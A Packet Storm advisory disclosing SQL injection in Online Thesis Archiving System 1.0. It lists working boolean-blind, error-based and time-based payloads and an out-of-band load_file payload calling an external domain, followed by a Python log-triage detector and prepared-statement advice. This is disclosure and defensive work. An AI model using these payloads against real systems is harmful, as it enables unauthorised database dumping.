
Online Thesis Archiving System 1.0 SQL Injection

Online Thesis Archiving System version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
## Title: OTAS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can dump all information from the database of this system, and then he can use it for dangerous and malicious purposes!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)

## Time spent:
01:15:00
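
A log-triage helper for the payload classes listed above, as an added example that is not part of the advisory or of the vendor's code. It parses a form-encoded login body and reports which indicator classes appear in the `password` field. The rule set, the function name `flag_login_body` and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Indicator classes mirror the payload types listed in the advisory.
RULES = {
    "time-based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "error-based": re.compile(r"information_schema|floor\s*\(\s*rand\s*\(", re.I),
    "out-of-band": re.compile(r"load_file\s*\(", re.I),
    # A quote (optionally followed by a closing bracket), then OR/AND,
    # then a trailing SQL comment: the breakout shape of the blind payloads.
    "quote-breakout": re.compile(
        r"'\s*\)?\s*(?:or|and)\b.*(?:--\s|#)", re.I | re.S),
}

def flag_login_body(body: str, field: str = "password") -> list[str]:
    """Return sorted names of the rules matched by one form field."""
    values = parse_qs(body, keep_blank_values=True).get(field, [])
    return sorted({n for v in values for n, rx in RULES.items() if rx.search(v)})

# Constructed sample bodies (not captured traffic); the e-mail address and
# host name are placeholders.
SAMPLES = [
    "email=user%40example.test&password=O'Reilly-2023",
    "email=user%40example.test&password=x') OR NOT 1404=1404-- Eotr",
    "email=user%40example.test&password=x') AND (SELECT 1 FROM "
    "(SELECT(SLEEP(15)))a)-- b",
    "email=user%40example.test&password=x') AND (SELECT 1 FROM(SELECT COUNT(*),"
    "CONCAT(0x71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- c",
    r"email=user%40example.test&password="
    r"'+(select load_file('\\\\oob.example.test\\x'))+'",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(flag_login_body(body), body[:60])
```

Pattern matching of this kind only surfaces probing in logs or at a proxy; the injection itself is closed by binding the password as a parameter in a prepared statement.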
